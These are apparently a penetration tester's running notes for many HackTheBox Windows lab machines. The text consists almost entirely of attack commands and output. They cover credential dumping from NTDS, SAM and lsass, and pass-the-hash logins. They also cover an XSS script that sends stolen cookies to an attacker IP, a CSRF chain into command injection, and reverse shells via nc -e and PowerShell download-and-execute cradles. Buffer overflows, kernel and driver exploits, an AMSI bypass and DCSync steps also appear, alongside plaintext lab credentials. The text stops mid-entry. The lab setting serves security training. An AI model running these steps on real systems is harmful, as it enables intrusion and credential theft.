`secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL > backup_ad_dump`
`wc -l backup_ad_dump` 8005 lines `grep ':::' backup_ad_dump | awk -F: '{print $1}' > users` and `wc -l users` 2000 lines
`kerbrute_linux_amd64 userenum -d htb.local --dc apt.htb users` found 'Administrator@htb.local' 'APT$@htb.local' 'henry.vinson@htb.local'
`grep henry.vinson backup_ad_dump` henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
Failed: `crackmapexec smb htb.local -u henry.vinson -H hashes` STATUS_LOGON_FAILURE (the backup is stale, so the current NT hash is not the one on that entry)
the hash used next, e53d87d42adaa3ca32bdb34a876cbffb, is a different one for the same account; the dump holds more than the current entry (secretsdump `-history` prints the password-history hashes), so try each of them
`reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/henry.vinson@apt.htb query -keyName HKU` (impacket remote registry) lists subkeys like 'Software' and 'Network' ...
`reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/henry.vinson@apt.htb query -keyName HKU\\Software\\GiganticHostingManagementSystem` found cred henry.vinson_adm:G1#Ny5@2dvht
`evil-winrm -i apt.htb -u henry.vinson_adm -p G1#Ny5@2dvht`
Privilege_escalation(henry->admin)
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> Invoke-Binary /root/tool/winPEASany_ofs.exe
C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline\ConsoleHost_history.txt has a line mention "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force
*Evil-WinRM* PS> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel
which found "lmcompatibilitylevel : 2"
According to https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
"2" means Send NTLM response only, Client devices use NTLMv1 authentication, and they use NTLMv2 session security if the server supports it. Domain controllers accept LM, NTLM, and NTLMv2 authentication.
trigger an outbound SMB auth to kali by making Defender scan a file on our share: Defender runs as SYSTEM, so the auth comes from the machine account APT$, and with lmcompatibilitylevel 2 it is NTLMv1 (three DES encryptions of the server challenge keyed from the NT hash; with a fixed challenge the NT hash itself is recoverable, not just a crackable password)
edit 'Challenge = 1122334455667788' in '/etc/responder/Responder.conf' and start `responder -I tun0 --lm`
*Evil-WinRM* PS C:\Program Files\windows defender> .\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.9\share\file.txt
note: -ScanType 1:quick scan, 2:full scan, 3:specify file
OR Collect Net-NTLMv1 hash Via RPC / RoguePotato [ippsec_video][0xdf_post]
`python3 ~/tool/ntlmv1-multi-master/ntlmv1.py --ntlmv1 APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788`
script output: "To Crack with crack.sh use the following token NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384"
every walkthrough uses https://crack.sh/get-cracking/ to crack it and gets the result by email within 1 min, but now that site/page shows "down for maintenance"
which is why I never actually cracked the NTLMv1 hash and had to copy it from others: d167c3238864b12f5f82feae86a7f798
`secretsdump.py -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local'` DCSyncs with the DC machine account and got the administrator NTLM hash
`evil-winrm -u administrator -H c370bddf384a691d811ff3495e8a72e2 -i apt.htb`
Initial_Foothold 1
found tcp/8500 running 'ColdFusion 8' `searchsploit ColdFusion`
Adobe ColdFusion 8 - Remote Command Execution (RCE) https://www.exploit-db.com/exploits/50057
Initial_Foothold 2
directory traversal in the `locale` parameter (CVE-2010-2861) reads the admin password file: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
found password hash 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03, cracks to: happyday
the login page JavaScript submits an HMAC-SHA1 of the stored hash keyed with a salt hidden in the page source, so compute it in the browser dev tools console:
hex_hmac_sha1(document.loginform.salt.value, '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03');
use Burp to replace the 'cfadminPassword=' value with that HMAC (quickly, before the salt expires) and the login succeeds
https://nets.ec/Coldfusion_hacking#Writing_Shell_to_File
in 'Mappings' note where CFIDE lives on disk, then add a Scheduled Task that fetches a JSP shell from kali and saves the output under that path, run it, and browse to the shell
Privilege_escalation(tolis->system)
`systeminfo` and save in kali as 'systeminfo'
`./windows-exploit-suggester.py --update` got 2023-08-07-mssb.xls
`./windows-exploit-suggester.py -i systeminfo -d 2023-08-07-mssb.xls` found many
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe
`MS10-059.exe 10.10.14.26 9001`
Initial_Foothold
register and log in to the E-coin page; submitting a transfer says the admin will review it, i.e. an admin views our input, which leads to XSS (Cross Site Scripting)
<img src="10.10.14.5/test.jpg" /> <script src="http://10.10.14.5/test.js"></script> the python server only receives test.js (the img src has no scheme, so the browser resolved it relative to the site)
Note: responder caught a hash that didn't crack: [SMBv2] NTLMv2-SSP Hash : Cortin::BANKROBBER:8e03eb65c1ff…
create test.js: var request = new XMLHttpRequest(); request.open('GET', 'http://10.10.14.5/?cookies=' + btoa(document.cookie), true); request.send();
10.10.10.154 - - [13/Aug/2023 02:13:32] "GET /?cookies=dXNlcm5hbWU9WVdSdGFXNCUzRDsgcGFzc3dvcmQ9U0c5d1pXeGxjM055YjIxaGJuUnBZdyUzRCUzRDsgaWQ9MQ== HTTP/1.1" 200 -
`echo -n dXNlcm5hbWU9WVdSdGFXNCUzRDsgcGFzc3dvcmQ9U0c5d1pXeGxjM055YjIxaGJuUnBZdyUzRCUzRDsgaWQ9MQ== | base64 -d` output: username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D; id=1
`echo -n YWRtaW4= | base64 -d` admin, `echo -n SG9wZWxlc3Nyb21hbnRpYw== | base64 -d` Hopelessromantic; log in with admin:Hopelessromantic
SQL Injection in 'search users'
10' UNION SELECT user,password,3 from mysql.user;-- -
10' UNION SELECT 1,load_file('c:\\xampp\\htdocs\\admin\\backdoorchecker.php'),3;-- -
$bad = array('$(','&'); $good = "ls"; ($good becomes "dir" on Windows and the command must start with it) which means we can chain a second command with ';' or '|' to bypass the filter
if($_SERVER['REMOTE_ADDR'] == "::1"){ which means it only runs commands for requests coming from localhost
CSRF (Cross Site Request Forgery) through the admin's browser
host shell.js on kali: var request = new XMLHttpRequest(); var params = 'cmd=' + encodeURIComponent('dir|powershell -c "iwr -uri 10.10.14.5/nc64.exe -outfile %temp%\\n.exe"; %temp%\\n.exe -e cmd.exe 10.10.14.5 443'); request.open('POST', 'http://localhost/admin/backdoorchecker.php', true); request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); request.send(params);
submit this so the admin's browser loads it: <script src="http://10.10.14.5/shell.js"></script>
shell.js then POSTs 'cmd=dir|payload' to backdoorchecker.php from the admin's own browser on the server, with the admin's cookies attached
that request really does come from the machine itself, so $_SERVER['REMOTE_ADDR'] == "::1" is true
and the payload runs
Privilege_escalation(cortin->system)
found C:\bankv2.exe; `icacls bankv2.exe` outputs 'Toegang geweigerd', which is 'Access denied' in Dutch
`netstat -anop TCP` found PID 1564 listening on TCP 0.0.0.0:910
`tasklist /FI "PID eq 1564"` shows it is bankv2.exe
enum a little using nc.exe and setup port forwarding
kali# chisel_1.7.6_linux_amd64 server -p 8000 --reverse
target> chisel.exe client 10.10.14.5:8000 R:910:127.0.0.1:910
on kali `nc 127.0.0.1 910`: the '4 digit PIN code to login' accepts 0021
then the 'amount of e-coins' field is the BoF input
`msf-pattern_create -l 100` as the 'amount' got '[$] Executing e-coin transfer tool: 0Ab1...'
`msf-pattern_offset -q 0Ab1` offset is 32
test with AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCC got '[$] Executing e-coin transfer tool: BBBBCCCCCCCCCCCCCCCCCCCC', so everything after byte 32 replaces the path of the tool the service executes
payload (with `nc -lnvp 9002` on kali): AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\users\public\nc -e cmd.exe 10.10.14.5 9002
Initial_Foothold
Drupal 7.x Services Module Remote Code Execution https://www.exploit-db.com/exploits/41564
gobuster dir found '/rest'
edit: $url = 'http://10.10.10.9'; $endpoint_path = '/rest'; 'filename' => 'shell.php', 'data' => ''
`php 41564.php` File written: http://10.10.10.9/shell.php
`curl http://10.10.10.9/shell.php --data-urlencode "cmd=\\\\10.10.14.26\\share\\nc.exe -e cmd 10.10.14.26 9001"`
OR 44449.rb: fix the line endings with `dos2unix 44449.rb`, then use Burp to change the 'POST to CHANGELOG.txt' request into a 'GET to CHANGELOG.txt' and let the other requests through
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution https://www.exploit-db.com/exploits/44449
OR 44542.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) https://www.exploit-db.com/exploits/44542
Privilege_escalation(iusr->system)
0xdf ran `\\10.10.14.14\share\Watson.exe` on the target and found MS11-046
building Watson.exe:
Get target .NET versions: `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"` OR `c:\Windows\Microsoft.NET\Framework>dir /A:D` ('/A:D' lists only directories)
Get target arch: `systeminfo`
Compile Watson using Visual Studio: open Watson.sln->Project->Watson_Properties(Application), change 'Target framework' to the latest version present on the target; Watson_Properties(Build), change the CPU arch
Note: Watson supports Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004 and Windows Server 2016 & 2019
ippsec searched for 'windows server 2008' and used MS15-051
`ms15-051.exe "nc.exe -e cmd.exe 10.10.14.26 9002"`
Initial_Foothold
`smbmap -H 10.10.10.134 -u anonymous` found the 'backups' share is readable and writable
found WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
install the package providing guestmount (a tool for mounting virtual hard disk files on Linux): `apt install libguestfs-tools`
Failed: `guestmount --add ./smbmnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro ./smbmnt2/` 'no operating system was found on this disk'
It is better to run it on Pwnbox (HackTheBox's dedicated virtual machine inside its internal network)
`guestmount --add ./mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro ./mnt2/` I did this on pwnbox
found SAM,SECURITY,SYSTEM in /mnt2/Windows/System32/config/
`secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL` got hashes, crack with crackstation.net
cred: L4mpje:bureaulampje administrator:thXLHM96BeKL0ER2
SSH with L4mpje:bureaulampje
Privilege_escalation
found C:\Program Files (x86)\mRemoteNG (a remote connection management tool)
found password hash in C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
https://github.com/kmahyyg/mremoteng-decrypt
`python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==` Password: thXLHM96BeKL0ER2
`ssh administrator@10.10.10.134` thXLHM96BeKL0ER2
Initial_Foothold
`smbmap -H 10.10.10.192 -u anonymous -R` found lots of usernames in the 'profiles$' share; saved them as smbprofiles_users.txt
`./GetNPUsers.py 'BLACKFIELD.local/' -usersfile ./smbprofiles_users.txt -format hashcat -outputfile hashes.asreproast -dc-ip 10.10.10.192` only svc_backup and support produce different output
`hashcat hashes.asreproast --wordlist /usr/share/wordlists/rockyou.txt` got support:#00^BlackKnight
Failed: `crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'`
Failed: `ldapsearch -h 10.10.10.192 -D cn=support,dc=blackfield,dc=local -w '#00^BlackKnight' -x -b 'dc=blackfield,dc=local'`
`crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'` `smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'` can READ: IPC$ NETLOGON profiles$ SYSVOL
`bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 --zip`
bloodhound GUI search 'support', the user has 1 'First Degree Object Control' which is 'ForceChangePassword' on user 'AUDIT2020'
Linux example: `net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"` [if the password contains '!', escape it as '\!']
0xdf used: `rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "0xdf!!!"'`
Note: '23' is from https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6?redirectedfrom=MSDN
Failed: `crackmapexec winrm 10.10.10.192 -u audit2020 -p '0xdf!!!'`
`crackmapexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!'` `smbmap -H 10.10.10.192 -u audit2020 -p '0xdf!!!'` can READ: IPC$ NETLOGON profiles$ SYSVOL forensic
found .\forensic\memory_analysis\lsass.zip; `unzip lsass.zip` gives lsass.DMP
`pip3 install pypykatz` `pypykatz lsa minidump lsass.DMP` got svc_backup:9658d1d1dcd9250115e2205d9f48400d (NT hash)
`crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d` works
`evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d`
Note: about lsass.dmp
Mimikatz can dump creds and hashes from lsass.exe. Anti-virus blocks that, but attackers can use procdump.exe (Sysinternals, signed by Microsoft) to dump lsass.exe,
then transfer the dump and run mimikatz OR pypykatz on the attacker's machine.
`procdump.exe -accepteula -ma lsass.exe lsass.dmp`
// or avoid reading lsass by dumping a cloned lsass process
`procdump.exe -accepteula -r -ma lsass.exe lsass.dmp`
Privilege_escalation(svc_backup->administrator)
`whoami /all` shows 'SeBackupPrivilege Back up files and directories Enabled', which 'basically allows for full system read' according to 0xdf
https://github.com/giuliano108/SeBackupPrivilege
root@kali# unix2dos cmd
transfer to target
*Evil-WinRM* PS C:\programdata> type cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit
*Evil-WinRM* PS C:\programdata> diskshadow /s cmd
*Evil-WinRM* PS C:\programdata> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\programdata> upload SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\programdata> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\programdata> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
*Evil-WinRM* PS C:\windows\temp> download NTDS
*Evil-WinRM* PS C:\windows\temp> download SYSTEM
root@kali# secretsdump.py -system SYSTEM -ntds NTDS LOCAL
root@kali# evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Initial_Foothold(system)
`nmap -p 445 -script vuln 10.10.10.40`
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) State: VULNERABLE
msf6 > search ms17-010
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.14
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
meterpreter > shell
Manual method: https://0xdf.gitlab.io/2021/05/11/htb-blue.html#python-script
https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
I've not tried this one
Initial_Foothold
gobuster dir found /uploadedfiles /transfer.aspx
Failed: renaming the upload in Burp to 'cmdasp.aspx%00.jpg'; /UploadedFiles/cmdasp.aspx shows an error about web.config
https://003random.com/posts/archived/2018/05/22/rce-by-uploading-a-web-config/
I never tried 003random's web.config; I used 0xdf's 'VBScript' version, in which the web.config file ends with:
<%@ Language=VBScript %>
<% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')") %>
trigger with http://10.10.10.93/UploadedFiles/web.config
Privilege_escalation(merlin->system)
https://github.com/decoder-it/juicy-potato
`.\jp.exe -t * -p c:\users\public\invoke-ps.ps1 -l 9001`
OR msf exploit(windows/local/ms10_092_schelevator) >
OR msf exploit(windows/local/ms16_014_wmi_recv_notif) >
Initial_Foothold
8080/contact.php shows 'Gym Management Software 1.0'
Gym Management System 1.0 - Unauthenticated Remote Code Execution https://www.exploit-db.com/exploits/48506
`python2 48506.py http://10.10.10.198:8080/`
Privilege_escalation(shaun->administrator)
`netstat` and `tasklist` found 'CloudMe.exe' running 'TCP 127.0.0.1:8888'
CloudMe 1.11.2 - Buffer Overflow (PoC) https://www.exploit-db.com/exploits/48389
`msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.26 lport=9002 -b '\x00\x0A\x0D' -f python -v payload`
kali# chisel_1.7.6_linux_amd64 server -p 8000 --reverse
target> chisel.exe client 10.10.14.26:8000 R:8888:127.0.0.1:8888
kali# python3 48389.py
Initial_Foothold
`ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people.txt`
found 'cascadeLegacyPwd: clk0bjVldmE=' in ldap-people.txt; `base64 -d` gives the cred r.thompson:rY4n5eva, which works on SMB (verified with crackmapexec)
`smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva` `smbclient -U r.thompson%rY4n5eva //10.10.10.182/Data`
I've not tried: smb: \> mask ""; prompt OFF; recurse ON; lcd smb/ ;mget *
I've not tried: mount -t cifs -o 'username=r.thompson,password=rY4n5eva' //10.10.11.182/Data /mnt
found '"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f' in //10.10.10.182/Data/IT/Temp/s.smith/VNC\ Install.reg
googling 'vnc install.reg password' found https://github.com/frizb/PasswordDecrypts
`echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv` output 'sT333ve2'
`evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2`
Privilege_escalation(s.smith->arksvc)
//10.10.10.182/Audit$/RunAudit.bat has 'CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"'
on a Windows VM (I use Commando), debug 'CascAudit.exe' in dnSpy with 'Audit.db' as the argument
set a breakpoint at the 'sqliteConnection.Close();' line and run; found cred arksvc:w3lc0meFr31nd
`evil-winrm -i 10.10.10.182 -u arksvc -p w3lc0meFr31nd`
Privilege_escalation(arksvc->administrator)
`net user arksvc` found it's in 'CASCADE\AD Recycle Bin' group
`Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects` found 'TempAdmin'
`Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *` found 'cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz'
`echo YmFDVDNyMWFOMDBkbGVz | base64 -d` got cred TempAdmin:baCT3r1aN00dles
`evil-winrm -i 10.10.10.182 -u administrator -p baCT3r1aN00dles`
Initial_Foothold
Achat 0.150 beta7 - Remote Buffer Overflow https://www.exploit-db.com/exploits/36025
`msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c \"iex(new-object net.webclient).downloadstring('http://10.10.14.29/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python`
if using '-a x86 --platform Windows -p windows/meterpreter/reverse_tcp', the shell dies very quickly unless msf auto-migrate is used
Initial_Foothold
`nmap -sU -p- --min-rate=1000 10.10.10.116` found '161/udp open snmp'
`snmpwalk -v 2c -c public 10.10.10.116 > snmpwalk_v2c.txt` found 'SNMPv2-MIB::sysContact.0 = STRING: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43'
crackstation cracked it to 'Dudecake1!'; `apt install strongswan` and edit /etc/ipsec.conf and /etc/ipsec.secrets
`ipsec up conceal`; if it does not work, try `ipsec restart`
run nmap again; found FTP and the default IIS web page
FTP anonymous upload of shell.asp; it is served at /upload/shell.asp
Privilege_escalation(destitute->system)
`whoami /all` 'SeImpersonatePrivilege Enabled'
https://github.com/ohpe/juicy-potato/releases
Initial_Foothold
FTP anonymous upload of webshell.asp; it is served at /webshell.asp
Privilege_escalation(web->system)
c:\Windows\Microsoft.NET\Framework>dir /A:D
OR `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"`
latest .NET on the target is v3.5 and `systeminfo` shows 'System Type: X86-based PC'; compile Watson on the Commando VM
https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046
upload and run MS11-046.exe to get a SYSTEM shell
Initial_Foothold
Failed: `smbmap -H 10.10.10.161` `smbmap -H 10.10.10.161 -u test -p test` `smbclient -N -L //10.10.10.161`
`rpcclient -U "" -N 10.10.10.161` then `enumdomusers`; save the usernames to a file 'users'
`for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done`
$krb5asrep$23$svc-alfresco@HTB:c213afe360b7bcbf08a522dcb423566c$d849f59924ba2b5402b66ee1ef332c2c827c6a5f972c21ff329d7c3f084c8bc30b3f9a72ec9db43cba7fc47acf0b8e14c173b9ce692784b47ae494a4174851ae3fcbff6f839c833d3740b0e349f586cdb2a3273226d183f2d8c5586c25ad350617213ed0a61df199b0d84256f953f5cfff19874beb2cd0b3acfa837b1f33d0a1fc162969ba335d1870b33eea88b510bbab97ab3fec9013e33e4b13ed5c7f743e8e74eb3159a6c4cd967f2f5c6dd30ec590f63d9cc354598ec082c02fd0531fafcaaa5226cbf57bfe70d744fb543486ac2d60b05b7db29f482355a98aa65dff2f
`john --wordlist=/usr/share/wordlists/rockyou.txt svc-alfresco` got svc-alfresco:s3rvice
`evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice`
Privilege_escalation(svc-alfresco->Administrator)
`bloodhound-python -u svc-alfresco -p 's3rvice' -ns 10.10.10.161 -d htb.local -c all --zip`
OR use SharpHound.ps1
*Evil-WinRM* PS> iex(new-object net.webclient).downloadstring("http://10.10.14.6/SharpHound.ps1") && invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
`smbserver.py share . -smb2support -username user -password pass`
*Evil-WinRM* PS> net use \\10.10.14.6\share /u:user pass
*Evil-WinRM* PS> copy .\*_BloodHound.zip \\10.10.14.6\share\
*Evil-WinRM* PS> net use /d \\10.10.14.6\share
bloodhound shows 'svc-alfresco' is in a nested group of the 'Account Operators' group, which has 'GenericAll' on the 'Exchange Windows Permissions' group, which has 'WriteDacl' on the domain
we can use 0xdf's PowerShell one-liner: Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
OR follow ippsec's steps:
*Evil-WinRM* PS> net user john abc123! /add /domain
*Evil-WinRM* PS> net group "Exchange Windows Permissions" john /add
*Evil-WinRM* PS> net localgroup "Remote Management Users" john /add
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> iex(new-object net.webclient).downloadstring('http://10.10.14.29/powerview.ps1')
*Evil-WinRM* PS> $pass = convertto-securestring 'abc123!' -asplain -force
*Evil-WinRM* PS> $cred = new-object system.management.automation.pscredential('htb\john', $pass)
*Evil-WinRM* PS> Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
`secretsdump.py svc-alfresco:s3rvice@10.10.10.161` got administrator hash
`wmiexec.py htb.local/administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6`
`evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6`
`psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42`
Initial_Foothold
save users from papercut webpage
`cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > wordlist` note: there is a 'Fabricorp01.docx' shown on page
`hydra -L users -P wordlist 10.10.10.193 smb` found tlavel:Fabricorp01 bhult:Fabricorp01
Failed(Authentication error): `smbmap -u tlavel -p Fabricorp01 -H 10.10.10.193` `smbmap -u bhult -p Fabricorp01 -H 10.10.10.193`
Failed(NT_STATUS_LOGON_FAILURE): `smbclient -U bhult -L \\\\10.10.10.193`
Failed(NT_STATUS_PASSWORD_MUST_CHANGE): `smbclient -U bhult -L \\\\10.10.10.193`
`smbpasswd -r 10.10.10.193 bhult` enter old pass 'Fabricorp01' and new pass
`rpcclient -U bhult%${pass} 10.10.10.193`
Note: the target resets the password every minute, so do it fast
0xdf oneliner: if echo "$pass" | smbclient -L //10.10.10.193 -U bhult 2>/dev/null >/dev/null; then echo "Password $pass still good"; else pass=$(date +%s | md5sum | base64 | head -c7; echo .); (echo 'Fabricorp01'; echo "$pass"; echo "$pass";) | smbpasswd -r 10.10.10.193 -s bhult; echo "password reset to $pass"; fi; smbmap -H 10.10.10.193 -u bhult -p "$pass"
`rpcclient -U bhult%${pass} 10.10.10.193` then `querydispinfo` save users `enumprinters` found pass: $fab@s3Rv1ce$1
`crackmapexec winrm 10.10.10.193 -u users -p '$fab@s3Rv1ce$1' --continue-on-success`
`evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'`
Privilege_escalation(svc-print->system)
`whoami /all` shows 'SeLoadDriverPrivilege Enabled'
`get-item 'hklm:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\'` shows zero protection
https://www.tarlogic.com/blog/seloaddriverprivilege-privilege-escalation/
https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
upload the vulnerable driver file 'Capcom.sys' to the target
https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
check the arch `systeminfo`
check .Net version `dir /A:D \Windows\Microsoft.NET\Framework` OR `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"`
compile eoploaddriver.cpp in Visual Studio as eoploaddriver.exe and upload it to the target
https://github.com/tandasat/ExploitCapcom
edit the payload line of ExploitCapcom.cpp in Visual Studio, then compile as EoPLoadDriver.exe and upload to the target
original payload line: TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
my edited payload line: TCHAR CommandLine[] = TEXT("C:\\ProgramData\\9001.exe");
of course I upload the 9001.exe as well
`.\eoploaddriver.exe System\CurrentControlSet\dfserv C:\ProgramData\Capcom.sys`
`.\ExploitCapcom.exe`
Initial_Foothold
Failed: Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow https://www.exploit-db.com/exploits/41738
but `searchsploit -m 41738` shows 'Codes: CVE-2017-7269'
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell
https://github.com/crypticdante/CVE-2017-7269/blob/main/ii6_reverse_shell.py
`python2 ./iis6-CVE-2017-7269.py 10.10.10.14 80 10.10.14.4 9001`
Privilege_escalation(network service->system)
`whoami /all` found 'SeImpersonatePrivilege Enabled' and `systeminfo` shows it is Windows Server 2003
https://github.com/Re4son/Churrasco/blob/master/churrasco.exe
upload nc.exe and churrasco.exe as c.exe
`.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.4 9002"`
Initial_Foothold
nmap scan shows tcp80 has:
